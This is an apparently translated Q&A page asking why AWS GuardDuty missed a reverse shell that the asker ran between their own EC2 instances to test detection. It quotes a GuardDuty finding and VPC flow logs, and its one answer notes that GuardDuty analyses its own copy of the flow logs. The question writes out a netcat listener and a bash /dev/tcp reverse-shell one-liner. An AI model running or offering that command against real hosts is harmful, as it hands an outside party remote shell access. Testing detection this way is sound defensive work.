为什么 AWS GuardDuty 未检测到反向 shell？

Question

I ran nc -nvlp 6666 on an example "attacker" aws EC2 instance and then I ran a bash reverse shell on my EC2 instance monitored by GuardDuty & VPC flowlogs in a public subnet: bash -i >& /dev/tcp/54.4.4.12/6666 0>&1

为什么 AWS GuardDuty 不使用以下方法将此攻击视为可疑：

Behavior:EC2/NetworkPortUnusual
An EC2 instance is communicating with a remote host on an unusual server port.
Default severity: Medium

Data source: VPC Flow Logs

This finding informs you that the listed EC2 instance in your AWS environment is behaving in a way that deviates from the established baseline. This EC2 instance has no prior history of communications on this remote port.

Note
If the EC2 instance communicated on port 389 or port 1389, then the associated finding severity will be modified to High, and the finding fields will include the following value:

service.additionalInfo.context = Possible log4j callback

（在运行反向 shell 之前，我让 GuardDuty 使用 VPC 流日志工作了 6 天。）

此流量确实存在于流日志中：

2022-01-04 08:41:03.000
5 966416534288 eni-XXXXg 172.12.13.6 54.X.X.X 32962 6666 6 5 273 1641278463 1641278522 ACCEPT OK vpc-XXXXX egress


2022-01-04 09:50:09.000 
5 966416534288 eni-XXXXg 172.12.13.6 54.X.X.X 34392 6666 6 6 416 1641282609 1641282665 ACCEPT OK vpc-XXXXX egress


2022-01-04 09:52:07.000
5 966416534288 eni-XXXXg 172.12.13.6 54.X.X.X 34434 6666 6 24 2517 1641282727 1641282785 ACCEPT OK vpc-XXXXX egress

Answer 1

GuardDuty 使用自己的流日志副本进行分析，如果您不需要将日志用于其他目的，则无需将其与 GuardDuty 分开启用。 请参阅https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_data-sources.html#guardduty_vpc